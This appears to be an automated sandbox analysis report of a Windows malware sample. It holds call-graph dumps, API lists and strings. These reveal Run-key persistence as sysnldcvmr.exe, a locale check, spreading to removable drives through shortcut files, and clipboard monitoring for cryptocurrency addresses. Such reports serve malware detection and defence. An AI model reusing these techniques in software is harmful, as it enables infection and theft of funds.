5524->5510 5526 40d039 5526->5510 5529 40d071 IsBadReadPtr 5526->5529 5531 40b570 184 API calls 5526->5531 5548 40bcc0 5526->5548 5528 40cfab InterlockedIncrement 5528->5510 5529->5526 5531->5526 5533 402413 5532->5533 5534 4023d9 5532->5534 5536 40ad40 5533->5536 5534->5533 5535 4023ea InterlockedIncrement 5534->5535 5535->5533 5537 40add0 2 API calls 5536->5537 5538 40ad4f 5537->5538 5539 40ad59 5538->5539 5540 40ad5d EnterCriticalSection 5538->5540 5539->5510 5539->5528 5541 40ad7c LeaveCriticalSection 5540->5541 5541->5539 5544 40bbd3 5543->5544 5545 40bbfd memcpy 5543->5545 5546 409fe0 9 API calls 5544->5546 5545->5526 5547 40bbf4 5546->5547 5547->5545 5549 40bce9 5548->5549 5550 40bcde 5548->5550 5549->5550 5551 40bd01 memmove 5549->5551 5550->5526 5551->5550 5552 401f50 GetQueuedCompletionStatus 5553 401f92 5552->5553 5554 402008 5552->5554 5555 401f97 WSAGetOverlappedResult 5553->5555 5559 401d60 5553->5559 5555->5553 5556 401fb9 WSAGetLastError 5555->5556 5556->5553 5558 401fd3 GetQueuedCompletionStatus 5558->5553 5558->5554 5560 401ef2 InterlockedDecrement setsockopt closesocket 5559->5560 5561 401d74 5559->5561 5563 401e39 5560->5563 5561->5560 5562 401d7c 5561->5562 5579 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5562->5579 5563->5558 5565 401d81 InterlockedExchange 5566 401d98 5565->5566 5567 401e4e 5565->5567 5566->5563 5572 401da9 InterlockedDecrement 5566->5572 5573 401dbc InterlockedDecrement InterlockedExchangeAdd 5566->5573 5568 401e67 5567->5568 5569 401e57 InterlockedDecrement 5567->5569 5570 401e72 5568->5570 5571 401e87 InterlockedDecrement 5568->5571 5569->5558 5574 401ae0 4 API calls 5570->5574 5575 401ee9 5571->5575 5572->5558 5576 401e2f 5573->5576 5577 401e7e 5574->5577 5575->5558 5580 401cf0 5576->5580 5577->5558 5579->5565 5581 401d00 InterlockedExchangeAdd 5580->5581 5582 401cfc 5580->5582 5583 401d53 5581->5583 5584 401d17 InterlockedIncrement 5581->5584 5582->5563 5583->5563 5588 401c50 WSARecv 5584->5588 5586 401d46 5586->5583 5587 401d4c InterlockedDecrement 5586->5587 5587->5583 5589 401cd2 5588->5589 5590 401c8e 5588->5590 5589->5586 5591 401c90 WSAGetLastError 5590->5591 5592 401ca4 Sleep WSARecv 5590->5592 5593 401cdb 5590->5593 5591->5589 5591->5590 5592->5589 5592->5591 5593->5586 5594 40d550 5604 4013b0 5594->5604 5596 40d5dd 5598 40d55d 5598->5596 5599 40d577 InterlockedExchangeAdd 5598->5599 5600 40d5bb WaitForSingleObject 5598->5600 5616 40b200 EnterCriticalSection 5598->5616 5621 40b520 5598->5621 5599->5598 5599->5600 5600->5598 5601 40d5d4 5600->5601 5624 401330 5601->5624 5605 409d90 7 API calls 5604->5605 5606 4013bb CreateEventA socket 5605->5606 5607 4013f2 5606->5607 5611 4013f8 5606->5611 5608 401330 7 API calls 5607->5608 5608->5611 5609 401401 bind 5612 401444 CreateThread 5609->5612 5613 401434 5609->5613 5610 401462 5610->5598 5611->5609 5611->5610 5612->5610 5634 401100 5612->5634 5614 401330 7 API calls 5613->5614 5615 40143a 5614->5615 5615->5598 5617 40b237 LeaveCriticalSection 5616->5617 5618 40b21f 5616->5618 5617->5598 5619 40bec0 3 API calls 5618->5619 5620 40b22a 5619->5620 5620->5617 5622 40b480 13 API calls 5621->5622 5623 40b561 5622->5623 5623->5598 5625 401339 5624->5625 5626 40139b 5624->5626 5625->5626 5627 401341 SetEvent WaitForSingleObject 5625->5627 5626->5596 5632 401362 5627->5632 5628 40138b 5663 40ab40 shutdown closesocket 5628->5663 5630 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5630->5632 5631 401395 5633 40a1b0 _invalid_parameter 3 API calls 5631->5633 5632->5628 5632->5630 5633->5626 5635 401115 ioctlsocket 5634->5635 5636 4011e4 5635->5636 5642 40113a 5635->5642 5637 40a1b0 _invalid_parameter 3 API calls 5636->5637 5639 4011ea 5637->5639 5638 4011cd WaitForSingleObject 5638->5635 5638->5636 5640 409fe0 9 API calls 5640->5642 5641 401168 recvfrom 5641->5638 5641->5642 5642->5638 5642->5640 5642->5641 5643 4011ad InterlockedExchangeAdd 5642->5643 5645 401000 5643->5645 5646 401014 5645->5646 5647 40103b 5646->5647 5648 409d90 7 API calls 5646->5648 5656 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5647->5656 5648->5647 5650 40105b 5657 401580 5650->5657 5652 4010ec 5652->5642 5653 4010a3 IsBadReadPtr 5655 401071 5653->5655 5654 4010d8 memmove 5654->5655 5655->5652 5655->5653 5655->5654 5656->5650 5658 401592 5657->5658 5659 4015a5 memcpy 5657->5659 5660 409fe0 9 API calls 5658->5660 5662 4015c1 5659->5662 5661 40159f 5660->5661 5661->5659 5662->5655 5663->5631 5888 40ca90 5889 40ad40 4 API calls 5888->5889 5890 40caa3 5889->5890 5891 40caba 5890->5891 5893 40cad0 InterlockedExchangeAdd 5890->5893 5894 40caed 5893->5894 5904 40cae6 5893->5904 5910 40cdc0 5894->5910 5897 40cb0d InterlockedIncrement 5907 40cb17 5897->5907 5898 40b520 13 API calls 5898->5907 5899 40cb40 5917 40aa20 inet_ntoa 5899->5917 5901 40cb4c 5902 40cc10 InterlockedDecrement 5901->5902 5918 40ab40 shutdown closesocket 5902->5918 5904->5891 5905 409fa0 __aligned_recalloc_base 7 API calls 5905->5907 5906 40ccf0 6 API calls 5906->5907 5907->5898 5907->5899 5907->5902 5907->5905 5907->5906 5908 40a1b0 _invalid_parameter 3 API calls 5907->5908 5909 40b570 184 API calls 5907->5909 5908->5907 5909->5907 5911 40cdcd socket 5910->5911 5912 40cde2 htons connect 5911->5912 5913 40ce3f 5911->5913 5912->5913 5914 40ce2a 5912->5914 5913->5911 5915 40cafd 5913->5915 5919 40ab40 shutdown closesocket 5914->5919 5915->5897 5915->5904 5917->5901 5918->5904 5919->5915 5920 406c16 5923 406bf8 5920->5923 5921 406d38 Sleep 5921->5923 5922 406c29 5924 4062c0 4 API calls 5922->5924 5923->5921 5923->5922 5925 406d48 ExitThread 5923->5925 5926 4063a0 4 API calls 5923->5926 5928 406c3a 5924->5928 5926->5923 5927 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5930 406cd6 wsprintfW 5927->5930 5931 406ceb wsprintfW 5927->5931 5928->5927 5929 406c5b 5928->5929 5930->5931 5932 4066b0 51 API calls 5931->5932 5932->5929 5933 40b420 5934 40b423 WaitForSingleObject 5933->5934 5935 40b451 5934->5935 5936 40b43b InterlockedDecrement 5934->5936 5937 40b44a 5936->5937 5937->5934 5938 40ab60 15 API calls 5937->5938 5938->5937 5939 401920 GetTickCount WaitForSingleObject 5940 401ac9 5939->5940 5941 40194d WSAWaitForMultipleEvents 5939->5941 5942 4019f0 GetTickCount 5941->5942 5943 40196a WSAEnumNetworkEvents 5941->5943 5944 401a43 GetTickCount 5942->5944 5945 401a05 EnterCriticalSection 5942->5945 5943->5942 5959 401983 5943->5959 5946 401ab5 WaitForSingleObject 5944->5946 5947 401a4e EnterCriticalSection 5944->5947 5948 401a16 5945->5948 5949 401a3a LeaveCriticalSection 5945->5949 5946->5940 5946->5941 5950 401aa1 LeaveCriticalSection GetTickCount 5947->5950 5951 401a5f InterlockedExchangeAdd 5947->5951 5954 401a29 LeaveCriticalSection 5948->5954 5981 401820 5948->5981 5949->5946 5950->5946 5999 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5951->5999 5952 401992 accept 5952->5942 5952->5959 5954->5946 5956 401a72 5956->5950 5956->5951 6000 40ab40 shutdown closesocket 5956->6000 5959->5942 5959->5952 5960 401cf0 7 API calls 5959->5960 5961 4022c0 5959->5961 5960->5942 5962 4022d2 EnterCriticalSection 5961->5962 5963 4022cd 5961->5963 5964 4022e7 5962->5964 5965 4022fd LeaveCriticalSection 5962->5965 5963->5959 5964->5965 5966 402308 5965->5966 5967 40230f 5965->5967 5966->5959 5968 409d90 7 API calls 5967->5968 5969 402319 5968->5969 5970 402326 getpeername CreateIoCompletionPort 5969->5970 5971 4023b8 5969->5971 5973 4023b2 5970->5973 5974 402366 5970->5974 6003 40ab40 shutdown closesocket 5971->6003 5975 40a1b0 _invalid_parameter 3 API calls 5973->5975 6001 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5974->6001 5975->5971 5976 4023c3 5976->5959 5978 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6002 4021e0 EnterCriticalSection LeaveCriticalSection 5978->6002 5980 4023ab 5980->5959 5982 401830 5981->5982 5991 40190f 5981->5991 5983 40183d InterlockedExchangeAdd 5982->5983 5982->5991 5984 401854 5983->5984 5983->5991 5985 401880 5984->5985 5984->5991 6004 4017a0 EnterCriticalSection 5984->6004 5989 401891 5985->5989 6013 40ab40 shutdown closesocket 5985->6013 5987 4018a7 InterlockedDecrement 5992 401901 5987->5992 5989->5987 5989->5992 5990 402247 5990->5949 5991->5949 5992->5990 5993 402265 EnterCriticalSection 5992->5993 5994 40229c LeaveCriticalSection DeleteCriticalSection 5993->5994 5997 40227d 5993->5997 5995 40a1b0 _invalid_parameter 3 API calls 5994->5995 5995->5990 5996 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5996->5997 5997->5996 5998 40229b 5997->5998 5998->5994 5999->5956 6000->5956 6001->5978 6002->5980 6003->5976 6005 401807 LeaveCriticalSection 6004->6005 6006 4017ba InterlockedExchangeAdd 6004->6006 6005->5984 6007 4017ca LeaveCriticalSection 6006->6007 6008 4017d9 6006->6008 6007->5984 6009 40a1b0 _invalid_parameter 3 API calls 6008->6009 6010 4017fe 6009->6010 6011 40a1b0 _invalid_parameter 3 API calls 6010->6011 6012 401804 6011->6012 6012->6005 6013->5989 6014 40d520 6017 401200 6014->6017 6016 40d542 6018 401314 6017->6018 6019 40121d 6017->6019 6018->6016 6019->6018 6020 409fa0 __aligned_recalloc_base 7 API calls 6019->6020 6021 401247 memcpy htons 6020->6021 6022 4012ed 6021->6022 6023 401297 sendto 6021->6023 6024 40a1b0 _invalid_parameter 3 API calls 6022->6024 6025 4012b6 InterlockedExchangeAdd 6023->6025 6026 4012e9 6023->6026 6028 4012fc 6024->6028 6025->6023 6029 4012cc 6025->6029 6026->6022 6027 40130a 6026->6027 6030 40a1b0 _invalid_parameter 3 API calls 6027->6030 6028->6016 6031 40a1b0 _invalid_parameter 3 API calls 6029->6031 6030->6018 6032 4012db 6031->6032 6032->6016 6033 40e121 6035 40e12a 6033->6035 6034 40e21d 6035->6034 6036 40e193 lstrcmpiW 6035->6036 6037 40e213 SysFreeString 6036->6037 6038 40e1a6 6036->6038 6037->6034 6039 40df10 2 API calls 6038->6039 6041 40e1b4 6039->6041 6040 40e205 6040->6037 6041->6037 6041->6040 6042 40e1e3 lstrcmpiW 6041->6042 6043 40e1f5 6042->6043 6044 40e1fb SysFreeString 6042->6044 6043->6044 6044->6040 5678 405970 GetWindowLongW 5679 405994 5678->5679 5680 4059b6 5678->5680 5681 4059a1 5679->5681 5682 405a27 IsClipboardFormatAvailable 5679->5682 5684 405a06 5680->5684 5685 4059ee SetWindowLongW 5680->5685 5696 4059b1 5680->5696 5688 4059c4 SetClipboardViewer SetWindowLongW 5681->5688 5689 4059a7 5681->5689 5686 405a43 IsClipboardFormatAvailable 5682->5686 5687 405a3a 5682->5687 5683 405ba4 DefWindowProcA 5690 405a0c SendMessageA 5684->5690 5684->5696 5685->5696 5686->5687 5691 405a58 IsClipboardFormatAvailable 5686->5691 5693 405a75 OpenClipboard 5687->5693 5712 405b3c 5687->5712 5688->5683 5692 405b5d RegisterRawInputDevices ChangeClipboardChain 5689->5692 5689->5696 5690->5696 5691->5687 5692->5683 5695 405a85 GetClipboardData 5693->5695 5693->5712 5694 405b45 SendMessageA 5694->5696 5695->5696 5697 405a9d GlobalLock 5695->5697 5696->5683 5697->5696 5698 405ab5 5697->5698 5699 405ac8 5698->5699 5700 405ae9 5698->5700 5701 405afe 5699->5701 5702 405ace 5699->5702 5703 405690 13 API calls 5700->5703 5719 4057b0 5701->5719 5704 405ad4 GlobalUnlock CloseClipboard 5702->5704 5713 405570 5702->5713 5703->5704 5708 405b27 5704->5708 5704->5712 5727 404970 lstrlenW 5708->5727 5711 40a1b0 _invalid_parameter 3 API calls 5711->5712 5712->5694 5712->5696 5714 40557b 5713->5714 5715 405581 lstrlenW 5714->5715 5716 405594 5714->5716 5717 409fa0 __aligned_recalloc_base 7 API calls 5714->5717 5718 4055b1 lstrcpynW 5714->5718 5715->5714 5715->5716 5716->5704 5717->5714 5718->5714 5718->5716 5724 4057bd 5719->5724 5720 4057c3 lstrlenA 5720->5724 5725 4057d6 5720->5725 5721 405630 2 API calls 5721->5724 5722 409fa0 __aligned_recalloc_base 7 API calls 5722->5724 5724->5720 5724->5721 5724->5722 5724->5725 5726 40a1b0 _invalid_parameter 3 API calls 5724->5726 5761 405760 5724->5761 5725->5704 5726->5724 5728 4049a4 5727->5728 5730 404c00 5728->5730 5736 404d30 StrStrW 5728->5736 5757 404bee 5728->5757 5729 404dbb StrStrW 5731 404dd2 StrStrW 5729->5731 5732 404dce 5729->5732 5730->5729 5730->5757 5733 404de5 5731->5733 5734 404de9 StrStrW 5731->5734 5732->5731 5733->5734 5735 404dfc 5734->5735 5743 404e12 5735->5743 5766 4048a0 lstrlenW 5735->5766 5736->5730 5738 404d58 StrStrW 5736->5738 5738->5730 5739 404d80 StrStrW 5738->5739 5739->5730 5740 40539b StrStrW 5741 4053b7 StrStrW 5740->5741 5747 4053ae StrStrW 5740->5747 5742 4053d3 StrStrW 5741->5742 5741->5747 5742->5747 5743->5740 5743->5747 5743->5757 5745 405470 StrStrW 5748 405483 5745->5748 5749 40548a StrStrW 5745->5749 5746 405469 5746->5745 5747->5745 5747->5746 5748->5749 5750 4054a4 StrStrW 5749->5750 5751 40549d 5749->5751 5752 4054b7 5750->5752 5753 4054be StrStrW 5750->5753 5751->5750 5752->5753 5754 4054d1 5753->5754 5755 4054d8 lstrlenA 5753->5755 5754->5755 5756 4054eb GlobalAlloc 5755->5756 5755->5757 5756->5757 5758 405506 GlobalLock 5756->5758 5757->5711 5758->5757 5759 405519 memcpy GlobalUnlock OpenClipboard 5758->5759 5759->5757 5760 405546 EmptyClipboard SetClipboardData CloseClipboard 5759->5760 5760->5757 5762 40576b 5761->5762 5763 405771 lstrlenA 5762->5763 5764 405630 2 API calls 5762->5764 5765 4057a4 5762->5765 5763->5762 5764->5762 5765->5724 5769 4048c4 5766->5769 5767 40490d 5767->5743 5768 404911 iswalpha 5768->5769 5770 40492c iswdigit 5768->5770 5769->5767 5769->5768 5769->5770 5770->5769 5771 40d5f0 5777 401470 5771->5777 5773 40d604 5774 40d615 WaitForSingleObject 5773->5774 5776 40d62f 5773->5776 5775 401330 7 API calls 5774->5775 5775->5776 5778 401483 5777->5778 5779 401572 5777->5779 5778->5779 5780 409d90 7 API calls 5778->5780 5779->5773 5781 401498 CreateEventA socket 5780->5781 5782 4014d5 5781->5782 5783 4014cf 5781->5783 5782->5779 5785 4014e2 htons setsockopt bind 5782->5785 5784 401330 7 API calls 5783->5784 5784->5782 5786 401546 5785->5786 5787 401558 CreateThread 5785->5787 5788 401330 7 API calls 5786->5788 5787->5779 5790 401100 20 API calls _invalid_parameter 5787->5790 5789 40154c 5788->5789 5789->5773 6045 40cc30 6050 40cc90 6045->6050 6048 40cc5e 6049 40cc90 send 6049->6048 6051 40cca1 send 6050->6051 6052 40cc43 6051->6052 6053 40ccbe 6051->6053 6052->6048 6052->6049 6053->6051 6053->6052 6054 40ceb0 6055 40ceb4 6054->6055 6056 40b200 5 API calls 6055->6056 6057 40ced0 WaitForSingleObject 6055->6057 6058 40cad0 198 API calls 6055->6058 6059 40cef5 6055->6059 6056->6055 6057->6055 6057->6059 6058->6055 5791 40ee74 5792 40ee7c 5791->5792 5793 40ef30 5792->5793 5797 40f0b1 5792->5797 5796 40eeb5 5796->5793 5801 40ef9c RtlUnwind 5796->5801 5799 40f0c6 5797->5799 5800 40f0e2 5797->5800 5798 40f151 NtQueryVirtualMemory 5798->5800 5799->5798 5799->5800 5800->5796 5802 40efb4 5801->5802 5802->5796 6060 406a39 6062 4069df 6060->6062 6061 406a0f lstrcmpiW 6061->6062 6062->6061 6063 406b8a FindNextFileW 6062->6063 6064 406a76 PathMatchSpecW 6062->6064 6067 406af4 PathFileExistsW 6062->6067 6073 406570 11 API calls 6062->6073 6065 4069b3 lstrcmpW 6063->6065 6066 406ba6 FindClose 6063->6066 6064->6062 6068 406a97 wsprintfW SetFileAttributesW DeleteFileW 6064->6068 6065->6062 6069 4069c9 lstrcmpW 6065->6069 6070 406bb3 6066->6070 6067->6062 6071 406b0a wsprintfW wsprintfW 6067->6071 6068->6062 6069->6062 6071->6062 6072 406b74 MoveFileExW 6071->6072 6072->6063 6073->6062 5803 40757a ExitThread 5804 40ee7c 5805 40ee9a 5804->5805 5807 40ef30 5804->5807 5806 40f0b1 NtQueryVirtualMemory 5805->5806 5809 40eeb5 5806->5809 5808 40ef9c RtlUnwind 5808->5809 5809->5807 5809->5808 5810 405f7d 5811 405f11 5810->5811 5812 405f7b 5811->5812 5815 405f66 memcpy 5811->5815 5813 40a1b0 _invalid_parameter 3 API calls 5812->5813 5814 405f88 LeaveCriticalSection 5813->5814 5815->5812

                                                                    Executed Functions

                                                                    Function 0040E730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 65 40e730-40e75c GetLocaleInfoA strcmp 66 40e762 65->66 67 40e75e-40e760 65->67 68 40e764-40e767 66->68 67->68
                                                                    APIs
                                                                    • GetLocaleInfoA.KERNELBASE(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                    • strcmp.NTDLL ref: 0040E752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocalestrcmp
                                                                    • String ID: UKR
                                                                    • API String ID: 3191669094-64918367
                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B
                                                                    Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351sleepfilesynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                    • DeleteFileW.KERNELBASE(?), ref: 0040763A
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                    • wcscmp.NTDLL ref: 00407663
                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                    • API String ID: 4172876685-2783337622
                                                                    • Opcode ID: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                    • Opcode Fuzzy Hash: be37c590e1d8e90253e276ab3f8f4dbbb477af03a6aa52447b81e277da3d58b1
                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D
                                                                    Function 0040E980 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 60sleepprocessCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 40e980-40e9e0 memset * 2 CreateProcessW 60 40e9f1-40ea15 ShellExecuteW 59->60 61 40e9e2-40e9ef Sleep 59->61 63 40ea26 60->63 64 40ea17-40ea24 Sleep 60->64 62 40ea28-40ea2b 61->62 63->62 64->62
                                                                    APIs
                                                                    • memset.NTDLL ref: 0040E98E
                                                                    • memset.NTDLL ref: 0040E99E
                                                                    • CreateProcessW.KERNELBASE(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                    • Sleep.KERNELBASE(000003E8), ref: 0040E9E7
                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                    • String ID: $D$Gy@$open
                                                                    • API String ID: 3787208655-4184347819
                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

                                                                    Non-executed Functions

                                                                    Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 69 4066b0-4066c5 _chkstk 70 4066c7-4066c9 69->70 71 4066ce-406780 wsprintfW * 5 PathFileExistsW 69->71 72 406bb9-406bbc 70->72 73 406782-4067a3 call 40e770 71->73 74 4067c4-4067d3 PathFileExistsW 71->74 73->74 83 4067a5-4067be SetFileAttributesW DeleteFileW 73->83 75 406874-406883 PathFileExistsW 74->75 76 4067d9-4067e8 PathFileExistsW 74->76 80 406885-40688b 75->80 81 4068ca-4068eb FindFirstFileW 75->81 78 406809-406818 PathFileExistsW 76->78 79 4067ea-406803 SetFileAttributesW DeleteFileW 76->79 86 40681a-40682b CreateDirectoryW 78->86 87 40683c-40684b PathFileExistsW 78->87 79->78 88 4068a5-4068b8 call 406460 80->88 89 40688d-4068a3 call 406460 80->89 84 4068f1-4069a9 81->84 85 406bb3 81->85 83->74 91 4069b3-4069c7 lstrcmpW 84->91 85->72 86->87 92 40682d-406836 SetFileAttributesW 86->92 87->75 93 40684d-406863 CopyFileW 87->93 100 4068bb-4068c4 SetFileAttributesW 88->100 89->100 96 4069c9-4069dd lstrcmpW 91->96 97 4069df 91->97 92->87 93->75 98 406865-40686e SetFileAttributesW 93->98 96->97 101 4069e4-4069f5 96->101 102 406b8a-406ba0 FindNextFileW 97->102 98->75 100->81 103 406a06-406a0d 101->103 104 4069f7-406a00 101->104 102->91 105 406ba6-406bad FindClose 102->105 106 406a3b-406a44 103->106 107 406a0f-406a2c lstrcmpiW 103->107 104->103 105->85 110 406a46 106->110 111 406a4b-406a5c 106->111 108 406a30-406a37 107->108 109 406a2e 107->109 108->106 109->104 110->102 112 406a6d-406a74 111->112 113 406a5e-406a67 111->113 114 406ae4-406aed 112->114 115 406a76-406a93 PathMatchSpecW 112->115 113->112 116 406af4-406b03 PathFileExistsW 114->116 117 406aef 114->117 118 406a95 115->118 119 406a97-406add wsprintfW SetFileAttributesW DeleteFileW 115->119 120 406b05 116->120 121 406b0a-406b5a wsprintfW * 2 116->121 117->102 118->113 119->114 120->102 122 406b74-406b84 MoveFileExW 121->122 123 406b5c-406b72 call 406570 121->123 122->102 123->102
                                                                    APIs
                                                                    • _chkstk.NTDLL(?,00406D30,?,?,?), ref: 004066B8
                                                                    • wsprintfW.USER32 ref: 004066EF
                                                                    • wsprintfW.USER32 ref: 0040670F
                                                                    • wsprintfW.USER32 ref: 0040672F
                                                                    • wsprintfW.USER32 ref: 0040674F
                                                                    • wsprintfW.USER32 ref: 00406768
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406778
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067B1
                                                                    • DeleteFileW.KERNEL32(?), ref: 004067BE
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067CB
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 004067E0
                                                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 004067F6
                                                                    • DeleteFileW.KERNEL32(?), ref: 00406803
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406810
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00406823
                                                                    • SetFileAttributesW.KERNEL32(?,00000002), ref: 00406836
                                                                    • PathFileExistsW.SHLWAPI(?), ref: 00406843
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1489398252.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000003.00000002.1489356853.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489419865.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1489438794.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_400000_2374323789.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExistsPathwsprintf$Attributes$Delete$CreateDirectory_chkstk
                                                                    • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\DriveSecManager.exe$%s\*$shell32.dll$shell32.dll
                                                                    • API String ID: 2467965697-1256475382
                                                                    • Opcode ID: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction ID: f76dd7f444767b2c43f85b167d980272eeebb95a9fd79305f50fc2a4155965b0
                                                                    • Opcode Fuzzy Hash: 6fdb608ebf9e3f7754ee061c031def056059c2a3e2aafc618c301169eaa81d58
                                                                    • Instruction Fuzzy Hash: BFD162B5900258ABCB20DF50DC44BEA77B8BB48304F0485EAF60AE6191D7B99BD4CF59
                                                                    Function 00404970 Relevance: 70.9, APIs: 24, Strings: 16, Instructions: 905clipboardstringmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040498C
                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404D39
                                                                    • StrStrW.SHLWAPI(00000000,cosmos), ref: 00404D61
                                                                    • StrStrW.SHLWAPI(00000000,addr), ref: 00404D89
                                                                    • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 00404DC4
